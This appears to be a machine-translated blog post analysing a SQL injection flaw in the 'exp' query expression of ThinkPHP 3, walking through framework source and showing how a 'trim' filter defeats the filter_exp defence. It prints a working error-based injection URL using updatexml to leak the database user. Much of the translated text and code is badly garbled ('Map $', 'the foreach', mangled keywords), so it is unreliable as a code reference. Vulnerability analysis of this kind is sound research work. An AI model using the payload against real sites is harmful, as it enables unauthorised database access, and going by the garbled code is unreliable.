It recently java framework source code is also looking a little headache, but also a lot of familiar review
There are a lot of things not to do ... Man Manao.
Online seems to have no particular detailed analysis fraught with me now.
exp expression 0x01 tp3
Query expression using the format:
Map $ [ 'field name'] = Array ( 'expression', 'query');
Expression case insensitive, support query expressions are the following categories, meaning respectively are:
Look at the focus exp
EXP expression supports SQL query syntax sql injection is very easy to produce.
$map['id'] = array('in','1,3,8');
Can be changed to:
$map['id'] = array('exp',' IN (1,3,8) ');
Conditions exp query will not be treated as a string, so the query behind can use any SQL syntax support, including the use of functions and field names. Query expression not only for query, data updates can also be used, for example:
Support more complex queries For example:
User $ = M ( "User"); // instantiate the User object // to modify the data object attributes assigned $ Data [ 'name'] = 'ThinkPHP' ; $ Data [ 'Score'] = Array ( 'exp' , 'Score +. 1'); // user integral plus. 1 $ the user -> WHERE ( '= ID. 5') -> save ( $ data ); // save the modified data according to the conditions
Query Expressions
Map $ [ 'field. 1'] = Array ( 'expression', 'query. 1' ); $ Map [ 'field 2'] = Array ( 'expression', 'query condition 2' ); $ the Model -> the WHERE ( $ the Map ) -> the SELECT ();
0x02 exp expression injection analysis
The above is a simple demonstration of the use of exp, this time can be passed in an array, use the exp mode then the underlying sql statements directly spliced to produce injection
http://www.qing-tp3.com/index.php/home/index/index2/?id[0]=exp&id[1]==updatexml(0,concat(0x0e,user(),0x0e),0)
F7 follow
With the \ ThinkPHP \ Library \ Think \ Db \ Driver.class.php 504 line
the foreach ( $ WHERE AS $ Key => $ Val ) { IF ( is_numeric ( $ Key )) { $ Key = '_Complex' ; } IF (0 === the strpos ( $ Key , '_' )) { // parse special conditions expression $ whereStr =. $ the this -> parseThinkWhere ( $ Key , $ Val ); } the else { // security filtering query field IF // (the preg_match (! '/ ^ [A-Z_ \ |. \ & \ - A-Z0-9 \ (\) \,] + $ /', TRIM (Key $))) { // E ( L ( '_ EXPRESS_ERROR _') ':'.. $ Key); //} // multiple conditions that support $ multi = is_array ( $ Val ) && isset ( $ Val [ '_multi' ]); $ Key = TRIM ( $ Key ); IF ( strpos ( $ Key , '|')) { // support name | title | nickname define query field $ Array = the explode ( '|', $ Key); $str = array();
View judgment
The first is parseKey ()
protected function parseKey(&$key) { $key = trim($key); if(!is_numeric($key) && !preg_match('/[,\'\"\*\(\)`.\s]/',$key)) { $key = '`'.$key.'`'; } return $key; }
filter_exp
function filter_exp(&$value){ if (in_array(strtolower($value),array('exp','or'))){ $value .= ' '; } }
I focus function codes:
// 取值操作 $data = $input[$name]; is_array($data) && array_walk_recursive($data,'filter_exp'); $filters = isset($filter)?$filter:C('DEFAULT_FILTER'); if($filters) { if(is_string($filters)){ $filters = explode(',',$filters); }elseif(is_int($filters)){ $filters = array($filters); } foreach($filters as $filter){ if(function_exists($filter)) { $data = is_array($data)?array_map_recursive($filter,$data):$filter($data); // 参数过滤 }else{ $data = filter_var($data,is_int($filter)?$filter:filter_id($filter)); if(false === $data) { return isset($default)?$default:NULL; } } } } }else{ // 变量默认值 $data = isset($default)?$default:NULL; }
So you can see there is no effective filtering of instant is filter_exp, if written,
filter_exp before fiter I function, so if the developers write I ( 'get.id', '', 'trim'), then removed directly behind exp space, resulting in ineffective filtration.
return:
}else { $whereStr .= $key.' = '.$this->parseValue($val); } } return $whereStr;